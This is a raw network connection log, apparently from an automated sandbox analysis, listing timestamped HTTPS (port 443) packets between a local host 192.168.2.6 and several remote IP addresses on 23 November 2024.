Nov 23, 2024 07:09:26.104300022 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.104320049 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.104336977 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.118979931 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.119003057 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.119049072 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.119067907 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.119096041 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.119111061 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.131798029 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.131815910 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.131870031 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.131890059 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.131906986 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.131922960 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.147587061 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.147608042 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.147671938 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.147692919 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.147735119 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.160305977 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.160326004 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.160379887 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.160404921 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.160430908 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.160445929 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.265034914 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.265053988 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.265124083 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.265163898 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.265187979 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.265211105 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.276408911 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.276438951 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.276479006 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.276493073 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.276525021 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.276547909 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.285612106 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.285648108 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.285691977 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.285706997 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.285736084 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.285758018 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.295758963 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.295777082 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.295846939 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.295861959 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.295913935 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.301296949 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.301354885 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.302253962 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.302258015 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.304008007 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.304013968 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.305202961 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.305221081 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.305275917 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.305293083 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.305324078 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.305345058 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.315306902 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.315340042 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.315377951 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.315395117 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.315424919 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.315450907 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.325467110 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.325483084 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.325531960 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.325541019 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.325576067 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.325602055 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.334302902 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.334317923 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.334367990 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.334374905 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.334398031 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.334422112 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.382404089 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:26.382424116 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:26.382484913 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:26.383759975 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:26.383776903 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:26.455339909 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.455368042 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.455413103 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.455426931 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.455475092 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.455490112 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.463172913 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.463197947 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.463247061 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.463254929 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.463289022 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.463299990 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.470894098 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.470915079 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.470956087 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.470963001 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.471003056 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.471021891 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.477740049 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.477761030 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.477801085 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.477808952 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.477857113 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.485991001 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.486011982 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.486067057 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.486073971 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.486114979 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.492911100 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:26.492973089 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:26.493062019 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.493081093 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.493119001 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.493125916 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.493158102 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.493180037 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.493618011 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:26.493626118 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:26.494168997 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:26.494175911 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:26.500663042 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.500690937 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.500725985 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.500732899 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.500760078 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.500776052 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.512717009 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.512738943 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.512779951 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.512795925 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.512820005 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.512849092 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.521177053 CET	49770	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:26.521218061 CET	443	49770	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:26.521280050 CET	49770	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:26.521637917 CET	49770	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:26.521652937 CET	443	49770	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:26.581403017 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.581459999 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.582026005 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.582030058 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.584485054 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.584491014 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.649909019 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.649938107 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.649981022 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.649997950 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.650022030 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.650042057 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.652532101 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.652590990 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.653055906 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.653062105 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.655112982 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.655117989 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.657582998 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.657603979 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.657645941 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.657654047 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.657695055 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.665426016 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.665447950 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.665481091 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.665489912 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.665518999 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.665540934 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.671648979 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.671669960 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.671708107 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.671715021 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.671760082 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.677918911 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.677939892 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.677973986 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.677979946 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.678009987 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.678028107 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.684766054 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.684786081 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.684843063 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.684851885 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.684890985 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.695107937 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.695132017 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.695171118 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.695180893 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.695216894 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.695230007 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.706410885 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.706430912 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.706487894 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.706496000 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.706537962 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.789582014 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.789612055 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.789638042 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.789670944 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.789725065 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.789732933 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.789856911 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.839997053 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.840020895 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.840127945 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.840148926 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.840178967 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.840255976 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.847758055 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.847778082 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.847872019 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.847872019 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.847886086 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.847939014 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.854603052 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.854624033 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.854707956 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.854707956 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.854717016 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.855175972 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.862334967 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.862354040 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.862447023 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.862456083 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.862560987 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.869667053 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.869688988 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.869843006 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.869843960 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.869853973 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.871020079 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.877420902 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.877444983 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.877484083 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.877491951 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.877543926 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.877543926 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.879023075 CET	49772	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:26.879043102 CET	443	49772	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:26.879141092 CET	49772	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:26.883019924 CET	49772	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:26.883028984 CET	443	49772	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:26.885241985 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.885263920 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.885365963 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.885365963 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.885374069 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.887022018 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.897802114 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.897824049 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.897906065 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.897906065 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.897914886 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.898906946 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.983418941 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.983444929 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.983561039 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.983561039 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:26.983577013 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:26.983947039 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.026571035 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.026637077 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.026678085 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.026705027 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.026741028 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.026860952 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.029032946 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.029102087 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.029129028 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.029156923 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.029215097 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.029215097 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.029216051 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.030109882 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.030123949 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.030152082 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.125591993 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.125612020 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.125808954 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.125957966 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.125967979 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.160981894 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.161036968 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.161106110 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.161120892 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.161200047 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.161200047 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.161835909 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.161864042 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.161884069 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.161950111 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.161950111 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.161963940 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.162219048 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.178185940 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.178210974 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.178281069 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.178302050 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.178319931 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.178500891 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.189399958 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.189465046 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.189501047 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.189511061 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.189524889 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.189584017 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.207145929 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:27.207169056 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:27.207418919 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:27.207447052 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:27.207551956 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:27.207766056 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:27.207813978 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:27.207819939 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:27.207868099 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:27.209834099 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.209844112 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.209933996 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.209933996 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.209950924 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.210047960 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.210746050 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.210794926 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.210838079 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.210848093 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.210876942 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.211020947 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.213474989 CET	49757	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:27.213495970 CET	443	49757	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:27.226464987 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.226619959 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.232140064 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.232193947 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.232230902 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.232240915 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.232266903 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.232320070 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.357213974 CET	443	49756	150.171.27.10	192.168.2.6
